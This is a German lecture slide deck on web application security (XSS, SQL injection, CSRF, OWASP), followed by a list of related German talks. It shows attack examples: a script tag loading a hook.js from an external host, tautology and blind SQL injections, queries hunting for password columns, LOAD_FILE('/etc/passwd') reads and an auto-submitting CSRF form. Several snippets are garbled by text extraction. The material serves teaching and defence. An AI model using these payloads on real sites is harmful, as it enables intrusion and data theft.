Welche Gefahren gehen vom Firmenauftritt im Internet aus?

Größe: px
Ab Seite anzeigen:

Download "Welche Gefahren gehen vom Firmenauftritt im Internet aus?"

Transkript

1 Die Webseite als Eintrittspunkt Welche Gefahren gehen vom Firmenauftritt im Internet aus?

2 Bekannt gewordene Schwachstellen & Angriffe

3 Bekannt gewordene Schwachstellen & Angriffe Quelle:

4 Bekannt gewordene Schwachstellen & Angriffe

5 Bekannt gewordene Schwachstellen & Angriffe

6 Vergleich Web-App vs. Applikation Web-Applikation (PHP, JSP, ASP, Ruby, ) Prinzipiell weltweit abrufbar Verwenden von standardisierten Protokollen Häufig sehr typische Entwurfs-Pattern (MVC) Zustandslos Session-Management wird notwendig Kommunikation lässt sich mit Proxy leicht untersuchen und verändern Anwendung (C,C++, VB, C#, Delphi, ) Häufig Installation notwendig In der Regel nur lokal verfügbar Gefundene Schwachstelle nicht sofort ausnutzbar Zustandsbehaftet Kommunikationsflüsse für Anwender nicht ersichtlich

7 Webanwendungen Komplexe Architekturen, basierend auf mehreren Plattformen und Protokollen Web Anwendung HTTP Network Client WebServer Anwendungsserver Datenbank Server Browser Mobil API Apache, IIS PresentaEon Layer Medien AuGereitung von Daten für Client Kapselt die Anwendungs Logic AuthenEfizierung, Session Management Erstellt Inhalte im User Context Liefert Inhalte auf Anfrage des Anwendungsserver z.b. User InformaEonen, Bestände

8 Webanwendungen Kommunikation i.d.r. über HTTP Hauptsächlich Austausch von Web-Inhalten (HTML, Bilder, CSS) Vollständig unter der Kontrolle des Clients Client WebServer Anwendungsserver Datenbank Server Browser Mobil API Apache, IIS PresentaEon Layer Medien AuGereitung von Daten für Client Kapselt die Anwendungs Logic AuthenEfizierung, Session Management Erstellt Inhalte im User Context Liefert Inhalte auf Anfrage des Anwendungsserver z.b. User InformaEonen, Bestände

9 Webanwendungen Internet Intranet Fire wall Datenbank Client Port 80/443 Webserver SAP Fire wall SMB

10 Auftreten von Schwachstellen Plaform AdministraEon Anwendung Bekannte Schwachstellen, z.b. Exploit für Apache Schwache Verschlüsselung z.b. bei älterer Version von IIS AdministraEve FunkEonen nicht ausreichend geschützt, z.b. versteckt Fehlerhade KonfiguraEon UnnöEge FunkEonen akeviert z.b. Server Stats InjecEon Cookies, SQL, XSS, CSRF, Parameter- ManipulaEon Brute Force Fehlende Validierung Session Management

11 Gründe für Angriffe Quelle:

12 Verwendete Angriffstechniken Quelle:

13

14 OWASP Best Practice Guides J2EE Encryption Windows Communication Foundation (WCF) Authentication SSL Virtual Patching Best Practices SDL Session Management Web Application Firewalls Application Code Review OWASP Good Component Practices Project

15 OWASP ZED Attack Proxy

16 OWASP Top 10 Zusammenfassung der Schwachstellen, die am häufigsten bei der Überprüfung von Webseiten erkannt wurden.

17 CWE/SANS Top 25 Quelle:http://cwe.mitre.org/top25/

18 Definition von Cross Site Scripting (XSS) XSS-Schwachstellen treten auf, wenn eine Anwendung nicht vertrauenswürdige Daten entgegen nimmt und ohne entsprechende Validierung und Kodierung an einen Webbrowser sendet. XSS erlaubt es einem Angreifer, Scriptcode im Browser eines Opfers auszuführen und somit Benutzersitzungen zu übernehmen, Seiteninhalte zu verändern oder den Benutzer auf bösartige Seiten umzuleiten. Quelle: hhps://www.owasp.org/images/b/b8/owasptop10_de_version_1_0.pdf

19 Unterscheidungen von XSS XSS wird je nach Stelle der Infektion bzw. Persistenz unterschieden: Reflektiert oder nicht-persistent sehr häufig / einfach Persistent oder beständig für Angriffe wünschenswert DOM-basiert oder lokal

20 Quelle: hhps://isc.sans.edu/diary.html?storyid=9130

21 Häufige Beispiele für XSS JavaScript-Code alert Eingebunden mit script-element Harmlos, dient zur Veranschaulichung https://www.owasp.org/index.php/xss_filter_evasion_cheat_sheet <script type="text/javascript">alert("xss");</script> Nachladen von Java Script aus externen Quellen <script src="http://bit.ly/1mhqd70" />

22 Reflektiertes XSS Nicht-persistentes oder reflektiertes Cross Site Scripting Benutzereingabe wird vom Server direkt zurückgeliefert Nur temporär, nicht gespeichert ohne manipulierte URL oder Formular nicht enthalten Beispiel: Suche auf einer Webseite Aufruf: Server (PHP): echo <p>sie suchten nach: $_GET[ suche ]</p> ; Ausgabe: Manipuliert: <p>sie suchten nach: Suchbegriff</p> type="text/ javascript">alert("xss")</script>

23 Persistentes XSS Schadcode wird auf dem Webserver gespeichert bei jeder passenden Anfrage ausgeliefert Beispiel: Daten werden in einer Datenbank gespeichert und irgendwann wieder ausgegeben Gästebuch auf einer Webseite Kommentare in Foren Zuletzt angemeldete/neu registrierte Benutzer Manipulierte Nachricht: Eine wirklich sehr informative Website!<script type="text/javascript">alert("xss")</script> Konkreter Angriff: Eine wirklich sehr informative Website!<script src="http://pb.c.ouk/hook.js" />

24

25 DOM basiertes XSS Nur Clientseitig Beispiel: JavaScript wird zum Suchen, Markieren oder Selektieren in bereits geladener Seite verwendet. Bild-Quelle:

26 Zusammenfassung der verschiedenen XSS-Arten Reflektiertes XSS Persistentes XSS DOM-based XSS

27 SQL-Injections SQLI bezeichnen die Vermischung von SQL-Abfragen und von Daten, die mit den Queries kombiniert werden sollen. Durch die Vermischung ändert sich der Sinn der Abfrage.

28 Structured Query Language - einfache Abfrage SELECT id, name, mail, gender FROM Accounts WHERE id = 41;

29 Login-Anfrage per PHP (vereinfacht) $pwdfromuserinput = $_POST[ password ]; Eingegebenes Passwort aus POST-Variable auslesen. $query = Select * from accounts where pwd = md5( $pwdfromuserinput ); ; Datenbank-Abfrage definieren, die Benutzer anhand seines verhashten Kennworts zurück gibt. $result = mysql_query($query); Anfrage an Datenbank abschicken.

30 Login-Anfrage per PHP (vereinfacht) Benutzer hat als Passwort Geheim12345! eingegeben: $pwdfromuserinput = $_POST[ password ]; $query = Select * from accounts where pwd = md5( $pwdfromuserinput ); ; $result = mysql_query($query); Inhalt der Variablen Query: Select * from accounts where pwd = md5( Geheim12345! ); Nutzerdaten sind in $query deutlich zu erkennen.

31 SQL Injection durch immer wahre Aussage Benutzer hat als Passwort xxx ) or ( 1 = 1 eingegeben: $pwdfromuserinput = $_POST[ password ]; $query = Select * from accounts where pwd = md5( $pwdfromuserinput ); ; $result = mysql_query($query); Inhalt der Variablen Query: Select * from accounts where pwd = md5( xxx ) or ( 1 = 1 ); Grenzen zwischen Nutzdaten und query verschwimmen.

32 Öffentliche Fehlermeldungen liefern Hilfe für SQL Injections

33 Durch SQL-Abfragen lässt sich Struktur der Datenbank rekonstruieren Durch einfache SQL-Abfragen lassen sich die Struktur der Datenbank, der Tabellen, die angemeldeten Benutzer und vieles mehr herausfinden. Alle Tabellen incl. Details in der Datenbank anzeigen: SELECT * FROM informaeon_schema.tables WHERE table_schema!= mysql AND table_schema!= informaeon_schema Alle Spalten einer Tabelle anzeigen: SELECT table_schema, table_name, column_name FROM informaeon_schema.columns WHERE table_schema!= mysql AND table_schema!= informaeon_schema

34 Gezielte Suche nach Tabellen mit Passwörtern Auch komplexere Abfragen per SQL- InjecEon sind möglich. Welche Tabelle besitzt eine Spalte deren name "pass" enthält? (Passwort, password, passwd) SELECT FROM WHERE table_schema, table_name informaeon_schema.columns column_name LIKE '%pass%';

35 Blind SQL-Injections ermöglichen Datenübertragung ohne Darstellung am Bildschirm Durch Blind InjecEon kann der Benutzer InformaEonen aus der Datenbank abrufen, obwohl diese nicht am Bildschirm dargestellt werden: Wenn die drime Stelle des Passworts ein "a" ist wird die weitere Bearbeitung um 5 Sekunden pausiert wenn nicht wird sie ohne Zeitverzögerung fortgesetzt. SELECT FROM WHERE if (substr(password 3, 1) == 'a', SLEEP(5), '') Accounts ID=324345;

36 SQL-Injection mit Zugriff auf Dateisystem Durch falsch gesetzte BenutzerberechEgungen sind auch Zugriffe auf das Dateisystem des Servers möglich! Dateien des Servers lesen: SELECT '1' FROM Accounts WHERE 1=2 UNION ALL SELECT LOAD_FILE('/etc/passwd') Dateien des Servers schreiben: SELECT 'pause' FROM dual INTO dumpfile 'C:\Autoexec.bat';

37 XKCD ist super! :) Quelle: hhp://xkcd.com/327/

38 SQL-Injection Tools Spezifische, freie Tools um SQL-Injections zu erproben: sqlmap (http://sqlmap.org/) SQL Inject Me (Firefox-Plugin, https://addons.mozilla.org/de/firefox/addon/sql-inject-me/)

39 Cross Site Request Forgery Bei CSRF versucht ein Angreifer einen legitimen Benutzer dazu zu veranlassen, ungewollt eine Aktion in seinem (Berechtigungs-) Kontext auszuführen.

40 Cross Site Request Forgery inject request POST/GET -Request Response

41 Demo - HTML-Webfrontend für Cross Site Request Forgery

42 Demo - PHP-Backend für Cross Site Request Forgery

43 Demo - Cross Site Request Forgery - Angriff mit erwarteten POST- Parametern <script> function SendAttack () { form. = // send to profile.php form.submit(); } </script> <body onload="javascript:sendattack();"> <form action="http://victim.example.com/profile.php" id="form" method="post"> <input type="hidden" name="firstname" value="funny"> <input type="hidden" name="lastname" value="joke"> <input type="hidden" name=" "> </form> </body>

44 Demo - Cross Site Request Forgery - Angriff mit erwarteten GET- Parametern <img src= />

45

46 Hochschule Augsburg HSASec Forschungsgruppe IT- Security + Forensik Noch Fragen?

web(in)securities CISCO Academy Day 11/12.05.2012 Mark Hloch Montag, 14. Mai 12

web(in)securities CISCO Academy Day 11/12.05.2012 Mark Hloch Montag, 14. Mai 12 Hochschule Niederrhein University of Applied Sciences Elektrotechnik und Informatik Faculty of Electrical Engineering and Computer Science web(in)securities CISCO Academy Day 11/12.05.2012 Mark Hloch Inhalt

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Dr. Marc Rennhard Institut für angewandte Informationstechnologie Zürcher Hochschule Winterthur marc.rennhard@zhwin.ch Angriffspunkt

Mehr

Sicherheit in Webanwendungen CrossSite, Session und SQL

Sicherheit in Webanwendungen CrossSite, Session und SQL Sicherheit in Webanwendungen CrossSite, Session und SQL Angriffstechniken und Abwehrmaßnahmen Mario Klump Die Cross-Site -Familie Die Cross-Site-Arten Cross-Site-Scripting (CSS/XSS) Cross-Site-Request-Forgery

Mehr

Aktuelle Sicherheitsprobleme im Internet

Aktuelle Sicherheitsprobleme im Internet Herbst 2014 Aktuelle Sicherheitsprobleme im Internet Wirtschaftsinformatik: 5. Semester Dozenten: Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW / Rainer Telesko - Martin Hüsler 1 Inhalt

Mehr

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus?

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Angreifbarkeit von Webapplikationen

Angreifbarkeit von Webapplikationen Vortrag über die Risiken und möglichen Sicherheitslücken bei der Entwicklung datenbankgestützter, dynamischer Webseiten Gliederung: Einführung technische Grundlagen Strafbarkeit im Sinne des StGB populäre

Mehr

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn Aktuelle Angriffstechniken Steffen Tröscher cirosec GmbH, Heilbronn Gliederung Angriffe auf Webanwendungen Theorie und Live Demonstrationen Schwachstellen Command Injection über File Inclusion Logische

Mehr

Sicherheit von Webapplikationen Sichere Web-Anwendungen

Sicherheit von Webapplikationen Sichere Web-Anwendungen Sicherheit von Webapplikationen Sichere Web-Anwendungen Daniel Szameitat Agenda 2 Web Technologien l HTTP(Hypertext Transfer Protocol): zustandsloses Protokoll über TCP auf Port 80 HTTPS Verschlüsselt

Mehr

Netzwerksicherheit Übung 9 Websicherheit

Netzwerksicherheit Übung 9 Websicherheit Netzwerksicherheit Übung 9 Websicherheit David Eckhoff, Tobias Limmer, Christoph Sommer Computer Networks and Communication Systems Dept. of Computer Science, University of Erlangen-Nuremberg, Germany

Mehr

itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 2013 OneConsult GmbH www.oneconsult.com

itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 2013 OneConsult GmbH www.oneconsult.com itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 13.03.2013 Agenda Vorstellung Open Web Application Security Project (OWASP) Die OWASP Top 10 (2013 RC1) OWASP Top 3 in der

Mehr

Einführung in Web-Security

Einführung in Web-Security Einführung in Web-Security Alexander»alech«Klink Gulaschprogrammiernacht 2013 Agenda Cross-Site-Scripting (XSS) Authentifizierung und Sessions Cross-Site-Request-Forgery ([XC]SRF) SQL-Injections Autorisierungsprobleme

Mehr

XSS for fun and profit

XSS for fun and profit 5. Chemnitzer Linux-Tag 1.-2.- März 2003 XSS for fun and profit Theorie und Praxis von Cross Site Scripting (XSS) Sicherheitslücken, Diebstahl von Cookies, Ausführen von Scripten auf fremden Webservern,

Mehr

Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10

Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10 The OWASP Foundation http://www.owasp.org Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10 Tobias Glemser tobias.glemser@owasp.org tglemser@tele-consulting.com Ralf Reinhardt

Mehr

Thema: SQL-Injection (SQL-Einschleusung):

Thema: SQL-Injection (SQL-Einschleusung): Thema: SQL-Injection (SQL-Einschleusung): Allgemein: SQL (Structured Query Language) ist eine Datenbanksprache zur Definition von Datenstrukturen in Datenbanken sowie zum Bearbeiten (Einfügen, Verändern,

Mehr

HACK THAT WEBSITE! WEB SECURITY IM SELBSTVERSUCH

HACK THAT WEBSITE! WEB SECURITY IM SELBSTVERSUCH HACK THAT WEBSITE! WEB SECURITY IM SELBSTVERSUCH Dr. Stefan Schlott, BeOne Stuttgart GmbH ABOUT.TXT Stefan Schlott, BeOne Stuttgart GmbH Java-Entwickler, Scala-Enthusiast, Linux-Jünger Seit jeher begeistert

Mehr

Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen

Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen Ralf Reinhardt 28.11.2013, 16:40 Uhr Roadshow Sicheres Internet aiti-park Werner-von-Siemens-Str. 6 86159 Augsburg 1 Hacker-Tool Browser Über

Mehr

HACK THAT WEBSITE! WEB SECURITY IM SELBSTVERSUCH

HACK THAT WEBSITE! WEB SECURITY IM SELBSTVERSUCH HACK THAT WEBSITE! WEB SECURITY IM SELBSTVERSUCH Dr. Stefan Schlott, BeOne Stuttgart GmbH ABOUT.TXT Stefan Schlott, BeOne Stuttgart GmbH Java-Entwickler, Scala-Enthusiast, Linux-Jünger Seit jeher begeistert

Mehr

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In)Security - Themen Alte Freunde SQL Injections, Code Executions & Co. Cross Site Scripting Cross Site Scripting in der Praxis JavaScript

Mehr

Aktuelle Angriffstechniken auf Web-Applikationen. Andreas Kurtz cirosec GmbH, Heilbronn

Aktuelle Angriffstechniken auf Web-Applikationen. Andreas Kurtz cirosec GmbH, Heilbronn Aktuelle Angriffstechniken auf Web-Applikationen Andreas Kurtz cirosec GmbH, Heilbronn Gliederung Schwachstellen-Überblick Präsentation aktueller Angriffstechniken XPath-Injection Cross-Site Request Forgery

Mehr

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011 Secure Coding & Live Hacking von Webapplikationen Conect Informunity 8.3.2011 Dr. Ulrich Bayer Security Research Sicherheitsforschung GmbH Motivation Datendiebstahl über (Web)-Applikationen passiert täglich

Mehr

Web Hacking - Angriffe und Abwehr

Web Hacking - Angriffe und Abwehr Web Hacking - Angriffe und Abwehr UNIX-Stammtisch 31. Januar 2012 Frank Richter Holger Trapp Technische Universität Chemnitz Universitätsrechenzentrum Motivation (1): Für uns Lehrveranstaltung: Techniken

Mehr

IHK: Web-Hacking-Demo

IHK: Web-Hacking-Demo sic[!]sec, Achim Hoffmann IHK: Web-Hacking-Demo, Bayreuth 1. April 2014 1 von 34 IHK: Web-Hacking-Demo Achim Hoffmann Achim.Hoffmann@sicsec.de Bayreuth 1. April 2014 sic[!]sec GmbH spezialisiert auf Web

Mehr

V10 I, Teil 2: Web Application Security

V10 I, Teil 2: Web Application Security IT-Risk-Management V10 I, Teil : Web Application Security Tim Wambach, Universität Koblenz-Landau Koblenz, 9.7.015 Agenda Einleitung HTTP OWASP Security Testing Beispiele für WebApp-Verwundbarkeiten Command

Mehr

HACK YOUR OWN WEBSITE! WEB SECURITY IM SELBSTVERSUCH. Stefan Schlott @_skyr

HACK YOUR OWN WEBSITE! WEB SECURITY IM SELBSTVERSUCH. Stefan Schlott @_skyr HACK YOUR OWN WEBSITE! WEB SECURITY IM SELBSTVERSUCH Stefan Schlott @_skyr DIE OWASP TOP-10 Alpha und Omega der Security-Talks :-) TOP 10 VON 2013 1. Injection 2. Broken Authentication/Session Management

Mehr

Hacking. InfoPoint 07.12.2005. Jörg Wüthrich

Hacking. InfoPoint 07.12.2005. Jörg Wüthrich Hacking InfoPoint 07.12.2005 Jörg Wüthrich Inhalte Rund um das Thema Hacking Angriffs-Techniken Session Handling Cross Site Scripting (XSS) SQL-Injection Buffer Overflow 07.12.2005 Infopoint - Hacking

Mehr

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink Hacker-Methoden in der IT- Sicherheitsausbildung Dr. Martin Mink Hacker-Angriffe 3.11.2010 Hacker-Methoden in der IT-Sicherheitsausbildung Dr. Martin Mink 2 Typische Angriffe auf Web- Anwendungen SQL Injection

Mehr

Advanced Web Hacking. Matthias Luft Security Research mluft@ernw.de

Advanced Web Hacking. Matthias Luft Security Research mluft@ernw.de Advanced Web Hacking Matthias Luft Security Research mluft@ernw.de ERNW GmbH. Breslauer Str. 28. D-69124 Heidelberg. www.ernw.de 6/23/2010 1 ERNW GmbH Sicherheitsdienstleister im Beratungs- und Prüfungsumfeld

Mehr

php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...

php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe... php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...7 3.Zugriff auf mysql Daten...11 Verteilte Systeme: php.sxw Prof.

Mehr

Carsten Eilers www.ceilers-it.de. Pentesters Toolbox

Carsten Eilers www.ceilers-it.de. Pentesters Toolbox Carsten Eilers www.ceilers-it.de Pentesters Toolbox Vorstellung Berater für IT-Sicherheit Autor PHP Magazin, Entwickler Magazin Buch Ajax Security www.ceilers-news.de und anderes... Schwachstellen-Datenbank

Mehr

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter Datensicherheit Vorlesung 5: 15.5.2015 Sommersemester 2015 h_da, Lehrbeauftragter Inhalt 1. Einführung & Grundlagen der Datensicherheit 2. Identitäten / Authentifizierung / Passwörter 3. Kryptografie 4.

Mehr

Online-Portale 2.0: Security ist auch ein Web-Design-Thema

Online-Portale 2.0: Security ist auch ein Web-Design-Thema Online-Portale 2.0: Security ist auch ein Web-Design-Thema Dirk Reimers Bereichsleiter Pentest / Forensik secunet Security Networks AG +49 201 54 54-2023 dirk.reimers@secunet.com Vorstellung Dirk Reimers

Mehr

Typo3 - Schutz und Sicherheit - 07.11.07

Typo3 - Schutz und Sicherheit - 07.11.07 Typo3 - Schutz und Sicherheit - 07.11.07 1 Angriffe auf Web-Anwendungen wie CMS oder Shop- Systeme durch zum Beispiel SQL Injection haben sich in den letzten Monaten zu einem Kernthema im Bereich IT- Sicherheit

Mehr

Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist?

Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist? Pallas Security Colloquium Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist? 18.10.2011 Referent: Tim Kretschmann Senior System Engineer, CISO Pallas GmbH Hermülheimer Straße 8a

Mehr

Secure Webcoding for Beginners

Secure Webcoding for Beginners Secure Webcoding for Beginners $awareness++ Florian Brunner Florian Preinstorfer 09.06.2010 Hacking Night 2010 Vorstellung Florian Brunner Software Engineer CTF-Team h4ck!nb3rg Student sib08 Florian Preinstorfer

Mehr

Web Application {Security, Firewall}

Web Application {Security, Firewall} Web Application {Security, Firewall} Mirko Dziadzka mirko.dziadzka@gmail.com http://mirko.dziadzka.de 18.1.2011 / IEEE SB Passau Alle Abbildungen aus http://www.heise.de/newsticker/archiv/ Inhalt Kurze

Mehr

14.05.2013. losgeht s

14.05.2013. losgeht s losgeht s 1 Agenda erläutern 2 Warum jetzt zuhören? 3 BSI-Quartalsbericht 4/2010 Die gefährlichsten Schwachstellen in Webauftritten Häufig wurden SQL-Injection(Weiterleitung von SQL-Befehlen an die Datenbank

Mehr

OpenWAF Web Application Firewall

OpenWAF Web Application Firewall OpenWAF Web Application Firewall Websecurity und OpenWAF in 60 Minuten Helmut Kreft Fuwa, 15.11.2010 Agenda Webapplikationen? Furcht und Schrecken! OWASP Top 10 - Theorie und Praxis mit dem BadStore Umgang

Mehr

Session Management und Cookies

Session Management und Cookies LMU - LFE Medieninformatik Blockvorlesung Web-Technologien Wintersemester 2005/2006 Session Management und Cookies Max Tafelmayer 1 Motivation HTTP ist ein zustandsloses Protokoll Je Seitenaufruf muss

Mehr

Sicherheit von Webapplikationen aus technischer Sicht

Sicherheit von Webapplikationen aus technischer Sicht Sicherheit von Webapplikationen aus technischer Sicht Security-Breakfast, Brühl, 14.09.2012 Tim Kretschmann Senior System Engineer Pallas GmbH Hermülheimer Straße 8a 50321 Brühl information(at)pallas.de

Mehr

Datenbank-basierte Webserver

Datenbank-basierte Webserver Datenbank-basierte Webserver Datenbank-Funktion steht im Vordergrund Web-Schnittstelle für Eingabe, Wartung oder Ausgabe von Daten Datenbank läuft im Hintergrund und liefert Daten für bestimmte Seiten

Mehr

Ablauf Unit2. Walkthrough

Ablauf Unit2. Walkthrough Ablauf Unit2 Vertiefendes Uebungsprojekt - SQL II Gerhard Wohlgenannt Test Vorstellung der Arbeitsumgebung (Software, Locations) Walkthrough Gruppeneinteilung + Themenvergabe Vorstellung der Arbeitsumgebung

Mehr

Web Application Security

Web Application Security Web Application Security Was kann schon schiefgehen. Cloud & Speicher Kommunikation CMS Wissen Shops Soziale Netze Medien Webseiten Verwaltung Chancen E-Commerce Kommunikation Globalisierung & Digitalisierung

Mehr

Web Application Testing

Web Application Testing Sicherheit von Web Applikationen - Web Application Testing Veranstaltung: IT-Sicherheitstag NRW, 04.12.2013, KOMED MediaPark, Köln Referent: Dr. Kurt Brand Geschäftsführer Pallas GmbH Pallas GmbH Hermülheimer

Mehr

Informationstechnik & System-Management SQL INJECTION. Selbstgemachte Sicherheitslücken. SQL-Injection ITSB2006 Michael Donabaum

Informationstechnik & System-Management SQL INJECTION. Selbstgemachte Sicherheitslücken. SQL-Injection ITSB2006 Michael Donabaum SQL INJECTION Selbstgemachte Sicherheitslücken Beschreibung SQL-Injection SQL-Einschleusung Ausnutzen von Sicherheitslücken in Zusammenspiel mit SQL-Datenbanken Mangelnde Maskierung von Metazeichen \ ;

Mehr

am Beispiel - SQL Injection

am Beispiel - SQL Injection am Beispiel - SQL Injection Einführung Warum ist Sicherheit ein Software Thema? Sicherheit in heutigen Softwareprodukten & Trends OWASP Top 10 Kategorien Hacking Demo SQL Injection: der Weg zu den Daten

Mehr

secunet Security Networks AG Sicherheit in Web-Portalen Hamburg, 22.11.2010 Dipl. Inform. Dirk Reimers

secunet Security Networks AG Sicherheit in Web-Portalen Hamburg, 22.11.2010 Dipl. Inform. Dirk Reimers secunet Security Networks AG Sicherheit in Web-Portalen Hamburg, 22.11.2010 Dipl. Inform. Dirk Reimers Vorstellung Dirk Reimers - DFN-CERT (bis 1998) - secunet seit 1999 - Principal Informations-Sicherheitsmanagement,

Mehr

Ablauf. Wichtige Termine. Vertiefendes Übungsprojekt - SQL II

Ablauf. Wichtige Termine. Vertiefendes Übungsprojekt - SQL II Ablauf Wichtige Termine Ablauf der Lehrveranstaltung Vorstellung des Projektthemas Projektgruppen Vorstellung der Arbeitsumgebung (Software, Locations) Walkthrough Datenbankentwurf Formulare PHP Security

Mehr

am Beispiel - SQL Injection

am Beispiel - SQL Injection am Beispiel - SQL Injection Einführung } Warum ist Sicherheit ein Software Thema? } Sicherheit in heutigen Softwareprodukten & Trends } OWASP Top 10 Kategorien Hacking Demo } SQL Injection: der Weg zu

Mehr

PHP und MySQL. Integration von MySQL in PHP. Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424. Michael Kluge (michael.kluge@tu-dresden.

PHP und MySQL. Integration von MySQL in PHP. Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424. Michael Kluge (michael.kluge@tu-dresden. Zentrum für Informationsdienste und Hochleistungsrechnen (ZIH) PHP und MySQL Integration von MySQL in PHP Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424 (michael.kluge@tu-dresden.de) MySQL

Mehr

BSI IT-Grundschutztag, 13.06.2013, Regensburg 2013 by sic[!]sec GmbH in Groebenzell, Germany. - For personal use only. - http://www.sicsec.

BSI IT-Grundschutztag, 13.06.2013, Regensburg 2013 by sic[!]sec GmbH in Groebenzell, Germany. - For personal use only. - http://www.sicsec. 1 BSI Grundschutzbaustein Webanwendungen Absicherung von Webanwendungen in der Praxis - Highlights aus den OWASP Top 10 Ralf Reinhardt 13.06.2013, 13:30 Uhr BSI IT-Grundschutztag Tagungs- und Besucherzentrum

Mehr

ZSDGMDZFGW... Zehn Sicherheitsprobleme, die gerne mit dem ZendFramework gebaut werden. Ben Fuhrmannek #phpug-köln 2.10.2009

ZSDGMDZFGW... Zehn Sicherheitsprobleme, die gerne mit dem ZendFramework gebaut werden. Ben Fuhrmannek #phpug-köln 2.10.2009 ZSDGMDZFGW Zehn Sicherheitsprobleme, die gerne mit dem ZendFramework gebaut werden Ben Fuhrmannek #phpug-köln 2.10.2009 Über mich Informatiker Entwickler IT Security 2 TOC Aufbau ZF Problem 1 bis 10 3

Mehr

SQL Injection Funktionsweise und Gegenmaßnahmen

SQL Injection Funktionsweise und Gegenmaßnahmen SQL Injection Funktionsweise und Gegenmaßnahmen EUROSEC GmbH Chiffriertechnik & Sicherheit Tel: 06173 / 60850, www.eurosec.com EUROSEC GmbH Chiffriertechnik & Sicherheit, 2005 Problematik SQL-Injection

Mehr

IT-Sicherheit auf dem Prüfstand Penetrationstest

IT-Sicherheit auf dem Prüfstand Penetrationstest IT-Sicherheit auf dem Prüfstand Penetrationstest Risiken erkennen und Sicherheitslücken schließen Zunehmende Angriffe aus dem Internet haben in den letzten Jahren das Thema IT-Sicherheit für Unternehmen

Mehr

Schwachstellenanalyse 2013

Schwachstellenanalyse 2013 Schwachstellenanalyse 2013 Sicherheitslücken und Schwachstellen in Onlineshops Andre C. Faßbender Schwachstellenforschung Faßbender 09.01.2014 Inhaltsverzeichnis 1. Abstract... 3 2. Konfiguration der getesteten

Mehr

Abbildung der Gefährdungen der WASC und OWASP auf die Gefährdungen und Maßnahmenempfehlungen des IT-Grundschutz-Bausteins B 5.

Abbildung der Gefährdungen der WASC und OWASP auf die Gefährdungen und Maßnahmenempfehlungen des IT-Grundschutz-Bausteins B 5. Abbildung der Gefährdungen der WASC und OWASP auf die Gefährdungen und Maßnahmenempfehlungen des IT-Grundschutz-Bausteins B 5.21 Die Zusammenstellung der Gefährdungen für den Baustein 5.21 bediente sich

Mehr

Web Applications Vulnerabilities

Web Applications Vulnerabilities Bull AG Wien Web Applications Vulnerabilities Philipp Schaumann Dipl. Physiker Bull AG, Wien www.bull.at/security Die Problematik Folie 2 Der Webserver ist das Tor zum Internet auch ein Firewall schützt

Mehr

Sichere Entwicklung und gängige Schwachstellen in eigenentwickelten SAP-Web- Anwendungen

Sichere Entwicklung und gängige Schwachstellen in eigenentwickelten SAP-Web- Anwendungen Sichere Entwicklung und gängige Schwachstellen in eigenentwickelten SAP-Web- Anwendungen Sebastian Schinzel Virtual Forge GmbH University of Mannheim SAP in a Nutshell Weltweit führendes Unternehmen für

Mehr

HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE. Münchener Open-Source-Treffen, Florian Maier, 23.05.2014

